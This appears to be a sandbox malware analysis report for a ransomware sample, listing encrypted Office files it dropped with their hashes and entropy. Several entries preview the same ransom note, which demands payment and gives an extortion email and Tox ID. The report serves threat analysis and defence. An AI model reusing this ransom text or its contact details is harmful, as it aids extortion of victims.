                                Preview:...wX..l.<..F,.I...h...eu.<W;..+....M......&.$X...=...7..3.2;.<w....tR....(.o!..Z=.......{W..M.Fj|......1z...EM....`..p..m....7.E.H.N.c....P...<.?..A..,..}.m..9...g.....+?.dv>._...H].2.M.......i....*p..h{e.C...0..}|........ZDa.$/.....5...f.TR...#..?.".\..3.k.O.z...}V.../...JKE.Kq}.P}.5....J-=j.....p.;o-..H.._V...[..8.#.e..4dW`.W.9D=.=&..A....^D.6...AF..\..8...%..AT.S]...}[Q..-.XC<..c.:U.....UQ..*R...A..,.M7A.!..i#...A~.....].*_.`.Q.?....F..m..}.....PT....<e.M.o#.....Z/.....eU.zf.'._..W[c6....L..........j..\h0....Cl^.....)........J....`"./.5..H....?.d.5.......# ......./.G...X.Z^...l....R...(...i......N.".y..@..;........&..a...^.*....1%n.Ub\P|.@.EI..Q.vZ....)q.kW<....2....|=^UlF.......YA.t....Y.!<../....(.>.*.U...pCW....7eEa._.....Bl^.EU..:I...._.&.P.`.I.h.d.2>Z..!...N/..0h......~.M..A...../z.....E&..(.....................fk.W...f

                                C:\Program Files (x86)\Microsoft Office\Office16\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\PackageManifests\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\ThinAppXManifest.xml

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5219
                                Entropy (8bit):7.969753279292825
                                Encrypted:false
                                SSDEEP:96:Dh6BO5x+1mAF6L7JsGB301ROufrTSVsLTdEvFrGzVOcevuAVOwO:16sx7JPS3JfrT/FI+Qc+VOwO
                                MD5:D5F2F8A8907DE87F924C46F815488EF9
                                SHA1:B0F04DA8D7CAEA4AAEB39BFC51A7B2695FA90E47
                                SHA-256:336BE0F8470C1DC1CCBAF627CED3EF05B29877E57F3E07D58B871743D5D14788
                                SHA-512:F8D58A317D20DCB7CF71CC4F4C4E57A95B1C4D0D3EFEB07A427E1C32C8CE14A6400CCADBC834244B2BAAA6805D4A10407902CEA5010483E71766DEBAD636F08A
                                Malicious:false
                                Preview:....Y...I..J...J.e.;Y.v.T.......YS...|<...].r...S....)...j._0.b.v7....B.7!.."F...ki..T....A.p.,T{..8$..N.2L ..$Y..B)X.*Q.......b..>)';U.Nc\.6...V.\R8 .....f&{.l.wj..i .^..-.5............4.&...Mh.9...H.....W...k1O.$......&.*._g.....1#/.j.9....2..3x.....4H.S.~|)}...c.>.'<....-(..{|.n.{....6.K7.?..-.. (.F..AR.}.o.....lI.i.......`(..~l.Q.).....q...j...i.e!0...b+...U.R.Dw..Z..^..z...:.%g...K.....?.6.\s.8...Sj{>.vkZy+.....k....=..|`a...xa..z...a..8....6@F..@..|...Z7|Hc........P...=L..:..c...%.."..hJ>qaA..."@..FE.....F.<Q....G.0..0-..S.40F.M...;S...b-X..K..u....#Y.k..o1...{NU.5.O=N.-.......l....r.....p......_S<#..+.od.]D...i.D./..x.C i..jH.F.....^....D*.H...$rs.-..V.. .(O.$...\.bXt8.bm..b...pg2..#..Z8u.EF@.2;..\.@{..s...y`...,......!...A>"9.c.G.f.....2...Z.$.....p.-:,f.......k6...\...7(....0:9_.$.P.k..c]./bW.....0H..D5..AM$.z.....A'm)..#.q.n8V..-1......N/.Y't.L..^g.......b...5.[..$..fR.....'1..}..I..../.....u.i...X....0..0.......lz.uO<...]n.q*.._...w

                                C:\Program Files (x86)\Microsoft Office\Updates\Apply\FilesInUse\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\Updates\ConfigFolders\BBF7ACC0-31FF-4C15-B05C-7341014DF78A\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\Updates\Download\PackageFiles\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\Updates\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\CLIPART\PUB60COR\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\CLIPART\Publisher\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Document Themes 16\Facet.thmx

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):739037
                                Entropy (8bit):7.952908837104348
                                Encrypted:false
                                SSDEEP:12288:Mz5RboJ3myGhslT8c2fscBNVRFCToZr5RCmUQHr+kRB5fWK66sO/NnnFwYlcgmH:M3bIrGCZ2xBbmsZdRC4Ck9H3p6pgmH
                                MD5:40368EDA6AE3B8354C360537C9D1237F
                                SHA1:AD40A4562D9082CDC011F76C90A7A74B64740619
                                SHA-256:9F0C86D7F9BB8D74E0E03E31BB09F68C74A097D8FF04C63C1ADC69B4FEC7D809
                                SHA-512:720ED4644D9C9295C6331F72989F97A472ABDC7E60056B91788FF58669A1A3DC612C770396F2C25D69FEC745A03E16E40BA94BF4C3EDD5F35E2F291F82860700
                                Malicious:false
                                Preview:.....#O8~.N6CvD%;.........M9.#j......;o............tv7. ..7.p...a=.C.v..66.?....F.?.;.(l.a.9f.Zp.k....S..0..sU..,.!..e9YO.].......-i0L,.S..6..^..g).8.fX.....m.v.......,urx.n...."r.1..!.k.O.-PR<.F3k@..i....E....O.*........&..y&QX....my>...s...b.#Ov..D...&....Xp..f.@F...M.oow.g8..*s.....C.D.1.q.ub....a.5..B..P.qF.s.m.5VU..a...Wq.g.ML..En^mQ[.y8.....Q_...}..GT....a.Sc.....&.E$!..!.x...]...4b.9B..Ck Z.g.$.pz............C;HC..'...1-lF[.#N...h...d.....3].W......>.jzk4..M.......}..g#%}..o..*.:0ne.6....3.......e(.EZn.+....fy3X.HP...&m........3Ox..-...-.>.,MCfOi.."....Uo1-Q..Q,G.... "S,...;y.f..*.9f.q...J.}...S[.^#<..2.A.vB.......m*......ee...f... ....t.:.P]..iF.>.....w...B....'P....#q..<....Xe.>.p(..A,;...o.L..?..%.e...;<..>..X..H.hz.r.j..j..W..7....1..x.U..."uYM,T.?..........a.*m...a.T...!Y;NvD.!...\.N..Lsp..I..e~....-....p..Y..bf..8!&'.....i.;[.b3.-...$.x8....r...>c=C'.j.R6T....,...!.V~oj..<.JT..O.......e..r......W{1N.W....l.Rs...#..`..

                                C:\Program Files (x86)\Microsoft Office\root\Document Themes 16\Gallery.thmx

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1526742
                                Entropy (8bit):7.978499590623346
                                Encrypted:false
                                SSDEEP:24576:ES9q8w3Tg/ATAJJB+VE3S7yVI+eptWDftSwDwmwDFqCjjqItlu:ESMn3c/AU+8AyVIdrwDgLjWItlu
                                MD5:123FB592E6D8C3EBD968B7A8B0C9C3A7
                                SHA1:646CAC582B15D3694940DDACDF310A4D6C4B798D
                                SHA-256:D2860CA1E7140788F9523979F92508928973976DE9F67C4C45BDEF0E25A5AB97
                                SHA-512:9F8820CBDFEBC497F00CAF260898A6DE6B7C93AA68D50CE35B138527C6BE089130977C95831C30F8355C238BE72E6B14B13760D45C4D2FDEE017032A1F6D722D
                                Malicious:false
                                Preview:k+......(.4..T..x*m{.....(.,......[P..ZG.............h..5......[J..J&d.L_d...C...3......7..z.pJ:P.cNk..M..u..!.p....|:...CL.~x.....*.A.h#].. J....MHT/.h.~!...Hw..%.*..?...xt...b..].$.....kD...p..5...s...e...Q].\.6...........u...@<...xc.r..*?U.......47:..X4...2.}.........../J.h..).\...X.8.k.e.Y&..{..bK'...8ls...ik..4......{.qc..R..$....).N.P....Z.Z.k.?.y....x.5....l.. 3..".....E..]..&T.+9~.H!.C..T..e..q.@..oo...5..s.....tg..=......h....wkH...........ofK.U..X@..{...7..5d:. .wI....X........<.CI..[ax..U."Y._.....,k]ss..?.EP......2....Q...~.".W~.p.....lg.kb.-..RR6..."-.|..b..bf.....8...d...a(.L...l@.Q=....7.._...#.3s..EqB..k.V,.'.2....:+...(....c...5._.vO..m`.a...e..a..N....b..BR....r.^..n....c..?..Y.i...g.Nz.k.#`7.]..'|....2.oP.cMm../.w...t>A..J...(H.".(..pW...D......U..^...d...E.:."k/;k..h%.8..p...u.E.i..+..@s......f..X..6K*U......].*...U...5..`.|....h...!....:<V..l!KMn.P.4.r...`.a...Q..L}.....=..G........).]...U......g.Z1mRNF.V.N.m.

                                C:\Program Files (x86)\Microsoft Office\root\Document Themes 16\Integral.thmx

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3446796
                                Entropy (8bit):7.9611405767191075
                                Encrypted:false
                                SSDEEP:98304:lAABjXt8md3x/pS6+X3Bzx3FVjbqOMhbJ52NID:pt8md3x/pS6uBzoNhtT
                                MD5:3CBE299688C617F3B5EE2BBC58ABE1C3
                                SHA1:DF2942835BEBD2C0F9CC825E8ADC63AC39536C8F
                                SHA-256:2BF317F84C4B861872181D95E29942266135997B99B98678A71562794CCE11B1
                                SHA-512:5234D4C7769EE962EBF7F6CF1022B17531EA8E9339BEBC0BE39363BA3D49C09BFDD27453877D9403CFB76E2BD337A0AA435D4CEA31FFCD2A843C93D5EC925B9C
                                Malicious:false
                                Preview:..%..V...~~.Q.....u...}..|....GW....U.pJ..>.....'.}6>^,4...Q..K..!...3|.6.<..^....vk..*[e...<t.....c....F..G.e.IO.A.$X...}....HQ.....Z.C...eM.n...9.i^....J.k.,O...a..{.V.....e...........&N{...5...j.MJc...T..e!.....$.(..^.I.{r...}..,..0[.DK.i.Ny.N.T}C.v1|.Z*......n}<.......R.)....#.R.....X...."q...=`d0L...Br .&..}Uw.h..a... F.....}-......j........U*.A....TLR...4..$3...#....c....m..f.[H...+-...Ep.o.......u......$.-9.$...Pi{?.....k.r...l.{eop.Pj.L.e..e...i.*..v..).p.6:.y.H>..6t..B|$jss......S..m......g.q....).]........E.......V..l..|.....J:...x.....P.R.......A.......Y;W8h..=T...X....Km......B..&.h.P..+5......z.....sf.l;K..._..OxbRa..L.......'$..EqC.)d...]yQ^Ne..._.o|.xQ..~{......0.8f..]%!...._/..O.....F$'H)W......t...-%.f......4..H..!:I......T...N.>|..W|.U#..).(..].eN.A0.;.fm...<.;..mK..1.......R.:Q.r.0.....\u.;7....n...Q....tv.<..k.%..".rrL.?.....1..F8i.UO+.....`R...2.i*.....l..;S..?..M.x..<>...T*...x......q...AFi1.%.s...fvb..r...R.

                                C:\Program Files (x86)\Microsoft Office\root\Document Themes 16\Ion Boardroom.thmx

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1595467
                                Entropy (8bit):7.945953786651401
                                Encrypted:false
                                SSDEEP:49152:yJAYlO3BpOmxQ0CpGPlt93AGnQ1kxnqIVF:yJAn3Up2RAIQYnqIv
                                MD5:38076B2B0AF360CADDA45731ADA0436B
                                SHA1:5A9BC147E43FF271A6868E649E08E3A47F1AE1FB
                                SHA-256:37F111E1D565F1AFC6590016EB3738AB75AC76A0A590EFF2767E413C2B8BB039
                                SHA-512:90BD4D412088350BA70D4A3799D8B42CEE87FA287B08C91108158A90531C1377D8CB0E076A7610BFD1594038A34E36BF2F0EADE4C38FAF6F00B6CB20C5D93521
                                Malicious:false
                                Preview:R..<X.*G........69.\vc.Tt........p.{.. .;&x).1U.1..M*...j2H&.|....w..c...H.1...v.r@...?.%.-.W.M(dS...t.b......9.t..........a....xt@......}......j'Y.x.L..i.:....d...........k..Q-~..l7.W..T..#....t...<....p.1.p9.5. .}.@n..D...G....-=..x...W....J.u.xO.Q...D],.r.p.4-..I..E.......0..`...h.{5h?)..u.......D>0..'-.bZ0......q.W~SbWe4SlX..L. I...MJ.gY....i...o....m5..D:X..g7q...(e..h.I....n_.1.......9..5..f...w..@.S1.6v...A.j.?/3j.-.c.q....e..L....W...0.,E.KI........h.K.^j.6.n.VVP..9.*...|]...S.{.vi..V..F$uY.Y....o.....H..7........g.r.t.........|`.mi.}...5.Eum..5...t..0....L..p.T...-Q.v.w...eFlJC...T..o.=......Q..)ui....j94..O......Fo..7.L...I..nC.>..=...Ew....u.9|..E.+..,....).w..].-f.b...d.H.@V,.;..\o.....UZ..z...}...5.u.H ....z5.#zSj..z..E.O....H$.W.>.V...w&g.......-.s...1.....$X...._...Q..n$Y../,1.t.$W..O.~O<.....H5...X4..].D..........w..$.P....j$..4b<Gq.....".../.x.r..deE.....!.R...y.....W!. .7$.S.J...[4.DUb..[../.F.]..k...}QRi..1t....

                                C:\Program Files (x86)\Microsoft Office\root\Document Themes 16\Ion.thmx

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1838139
                                Entropy (8bit):7.948010826456849
                                Encrypted:false
                                SSDEEP:49152:PYo3rCYlO3BpUxe0J29T8g+ycADO02rvizPctl:1Wn3AV29OycJ3
                                MD5:715C4EA911AB34C9BDF31E9DC3E0CDA9
                                SHA1:D606F9051883D9621C72D78AAC6801AD6EDF4E1F
                                SHA-256:748278FA2663C722AC479DD11752E1B6FE8841797C53070474825AFB4C0F52B8
                                SHA-512:6E9DC0E2DB54BDDBF1B5A786A7945B1C4D36C196DD359EC65ECAFB1506BAF1A60EEF695EEAA7986B0380A7D847D266C496ACF6A3C6C8FA80D884DF2B42BF1EBA
                                Malicious:false
                                Preview:.......wm.e..&.f...^..!K...#gdp.#gs,_6..CL..FG..^K);O"..o....y.*...Y.]..v..*.~.....].7t..y-.....s$.bN....I...|...uDA....&...A..[.&.3.e&x...A..u...|.?./.h._.P.p..B..4.I.X.&.W.=.2.a7&.X...[..E.@....~...".}_.9;....+Zs..U..r... .m.l.Lw.F.4.....k_~0Z$.JBr"M.o<i...m........._...........]C4f.d.....> .......1....,..B..r..l..]:Ar".^G...-.C|..sz.b...I..u.....;>..U..l.n.9....>D...].....r:..9+.000...X.y.{e..E4(o..){.A/..*K........?.7K....J..Rd....[&.h...p..]_..Uh.O.omj6U.A|....v.;.U..D.5&.}.......d.\.$...L..2y....yI..`fv...}/D......=E.=..{...B.;<.#*...{..2..}.....M.KkW`..+.i..K.B*)}.*...e..g.K.)..M...\.P.h..I.(A.....b...Y...O.r....r.0Do..WR.?.k).b.:._Ws=B;.3.2r~..tv...o.-.....}|.D...4F...:i.....%....t&yES...G$...WpS&o..|bl..L..w.g..g4..G........}4........`].1v$....Q:..JY.6...N...O.S..b../&_.v..g.UT.F..b...c;>....X..#...'m..j.9.......pI...?....h..i....4.n..G.y..P..\...00.W.........`.a..$......X..?I...k..k.SLx.J.7ql.u...m8....X.s.H..|..;l7.../......._z."...

                                C:\Program Files (x86)\Microsoft Office\root\Document Themes 16\Office 2013 - 2022 Theme.thmx

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):329396
                                Entropy (8bit):7.999458971342388
                                Encrypted:true
